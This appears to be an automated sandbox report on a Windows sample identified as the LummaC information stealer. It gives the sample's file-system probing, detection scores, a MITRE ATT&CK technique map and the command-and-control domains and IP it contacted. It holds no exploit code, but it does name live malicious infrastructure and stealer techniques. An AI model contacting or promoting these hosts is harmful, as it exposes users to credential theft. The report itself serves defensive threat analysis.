Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\GAOBCVIQIJ	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\MXPXCVPDVN	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\MXPXCVPDVN	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\SQSJKEBWDT	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\SQSJKEBWDT	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\GAOBCVIQIJ	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\GAOBCVIQIJ	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\MXPXCVPDVN	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\MXPXCVPDVN	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\SQSJKEBWDT	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\SQSJKEBWDT	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\GAOBCVIQIJ	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\GAOBCVIQIJ	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\MXPXCVPDVN	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\MXPXCVPDVN	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\SQSJKEBWDT	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\SQSJKEBWDT	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\GAOBCVIQIJ	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\GAOBCVIQIJ	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\MXPXCVPDVN	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\MXPXCVPDVN	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\SQSJKEBWDT	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\SQSJKEBWDT	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\SQSJKEBWDT	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\SQSJKEBWDT	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\GAOBCVIQIJ	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\GAOBCVIQIJ	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\SQSJKEBWDT	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\SQSJKEBWDT	Jump to behavior

Source: C:\Users\user\Desktop\uU6IvUPN39.exe

Directory queried: number of queries: 1001

Source: Yara match	File source: 00000000.00000002.1539384003.0000000000728000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: uU6IvUPN39.exe PID: 2960, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 Process Injection	1 Virtualization/Sandbox Evasion	2 OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Process Injection	LSASS Memory	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Deobfuscate/Decode Files or Information	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	41 Data from Local System	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	4 Obfuscated Files or Information	NTDS	2 File and Directory Discovery	Distributed Component Object Model	2 Clipboard Data	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	22 Software Packing	LSA Secrets	22 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
uU6IvUPN39.exe	57%	Virustotal		Browse
uU6IvUPN39.exe	55%	ReversingLabs	Win32.Trojan.Generic
uU6IvUPN39.exe	100%	Avira	HEUR/AGEN.1312582
uU6IvUPN39.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://skidjazzyric.click/apij;	100%	Avira URL Cloud	malware
https://skidjazzyric.click/	100%	Avira URL Cloud	malware
https://skidjazzyric.click/X	100%	Avira URL Cloud	malware
https://skidjazzyric.click:443/apiicrosoft	100%	Avira URL Cloud	malware
https://skidjazzyric.click/&_	100%	Avira URL Cloud	malware
https://skidjazzyric.click/E	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
skidjazzyric.click	104.21.96.1	true	false		high

Contacted URLs

Name	Malicious	Reputation
robinsharez.shop	false	high
versersleep.shop	false	high
https://skidjazzyric.click/api	false	high
soundtappysk.shop	false	high
crowdwarek.shop	false	high
skidjazzyric.click	false	high
handscreamny.shop	false	high
apporholis.shop	false	high
chipdonkeruz.shop	false	high
femalsabler.shop	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	uU6IvUPN39.exe, 00000000.00000003.1441695120.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441635320.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441762720.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	uU6IvUPN39.exe, 00000000.00000003.1441695120.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441635320.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441762720.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://skidjazzyric.click/apij;	uU6IvUPN39.exe, 00000000.00000003.1440748963.000000000072E000.00000004.00000020.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1440900569.000000000073A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	uU6IvUPN39.exe, 00000000.00000003.1441695120.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441635320.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441762720.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://skidjazzyric.click/	uU6IvUPN39.exe, 00000000.00000002.1539384003.0000000000718000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://skidjazzyric.click/X	uU6IvUPN39.exe, 00000000.00000003.1440748963.00000000006FE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	uU6IvUPN39.exe, 00000000.00000003.1441695120.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441635320.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441762720.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	uU6IvUPN39.exe, 00000000.00000003.1468276263.0000000002F5C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://upx.sf.net	Amcache.hve.4.dr	false		high
http://www.microsoft.	uU6IvUPN39.exe, 00000000.00000003.1440748963.000000000072E000.00000004.00000020.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000002.1539384003.0000000000728000.00000004.00000020.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1440924101.000000000076D000.00000004.00000020.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1440900569.000000000073A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	uU6IvUPN39.exe, 00000000.00000003.1441695120.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441635320.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441762720.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	uU6IvUPN39.exe, 00000000.00000003.1468276263.0000000002F5C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	uU6IvUPN39.exe, 00000000.00000003.1441695120.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441635320.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441762720.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	uU6IvUPN39.exe, 00000000.00000003.1469048428.00000000031BE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	uU6IvUPN39.exe, 00000000.00000003.1441695120.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441635320.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441762720.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://skidjazzyric.click:443/apiicrosoft	uU6IvUPN39.exe, 00000000.00000003.1481330230.0000000002F38000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://x1.c.lencr.org/0	uU6IvUPN39.exe, 00000000.00000003.1468276263.0000000002F5C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	uU6IvUPN39.exe, 00000000.00000003.1468276263.0000000002F5C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	uU6IvUPN39.exe, 00000000.00000003.1441695120.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441635320.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441762720.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	uU6IvUPN39.exe, 00000000.00000003.1468276263.0000000002F5C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.all	uU6IvUPN39.exe, 00000000.00000003.1469048428.00000000031BE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	uU6IvUPN39.exe, 00000000.00000003.1441695120.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441635320.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441762720.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://skidjazzyric.click/&_	uU6IvUPN39.exe, 00000000.00000003.1452952071.0000000002F1A000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1452838783.0000000002F1A000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1452979206.0000000002F1E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://skidjazzyric.click/E	uU6IvUPN39.exe, 00000000.00000003.1440748963.000000000072E000.00000004.00000020.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1440900569.000000000073A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.96.1	skidjazzyric.click	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1586508
Start date and time:	2025-01-09 08:42:38 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 1s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	uU6IvUPN39.exe renamed because original name is a hash value
Original Sample Name:	a478b8943ef3239752d731e7290c4a3d.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@2/5@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 92% Number of executed functions: 17 Number of non-executed functions: 231
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.189.173.21, 20.190.159.68, 4.175.87.197
Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryDirectoryFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
02:43:35	API Interceptor	5x Sleep call for process: uU6IvUPN39.exe modified
02:43:46	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.96.1	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	pelisplus.so/administrator/index.php
104.21.96.1	Recibos.exe	Get hash	malicious	FormBook	Browse	www.mffnow.info/1a34/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
skidjazzyric.click	xCnwCctDWC.exe	Get hash	malicious	LummaC	Browse	104.21.112.1
	DLKs2Qeljg.exe	Get hash	malicious	LummaC	Browse	104.21.48.1
	fuk7RfLrD3.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	Ljrprfl3BH.exe	Get hash	malicious	LummaC	Browse	104.21.64.1
	DPlvBkg4aj.exe	Get hash	malicious	LummaC	Browse	104.21.112.1
	chu4rWexSX.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	xHj1N8ylIf.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	GR7ShhQTKE.exe	Get hash	malicious	LummaC	Browse	104.21.64.1
	ab89jay39E.exe	Get hash	malicious	LummaC	Browse	104.21.64.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	104.21.64.1
	xCnwCctDWC.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	DLKs2Qeljg.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	fuk7RfLrD3.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	Ljrprfl3BH.exe	Get hash	malicious	LummaC	Browse	104.21.64.1
	PO1178236.scr.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	Subscription_Renewal_Invoice_2025_FGHDCS.html	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	PO1178236.scr.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	DPlvBkg4aj.exe	Get hash	malicious	LummaC	Browse	104.21.112.1
	https://qr.me-qr.com/PVhBu5SR	Get hash	malicious	Unknown	Browse	188.114.97.3

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	P2V7Mr3DUF.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	v3tb7mqP48.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	xCnwCctDWC.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	DLKs2Qeljg.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	fuk7RfLrD3.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	Ljrprfl3BH.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	DPlvBkg4aj.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	https://veryfast.io/?ap=adw&as=g_d_fast_in&dm%5Bads%5D=new_static&dm%5Btype%5D=dis&gad_source=5&gclid=EAIaIQobChMIgp352NzmigMVZAOzAB0wMA8oEAEYASAAEgI_hfD_BwE	Get hash	malicious	Unknown	Browse	104.21.96.1
	web55.mp4.hta	Get hash	malicious	LummaC	Browse	104.21.96.1

Dropped Files

⊘No context

Created / dropped Files

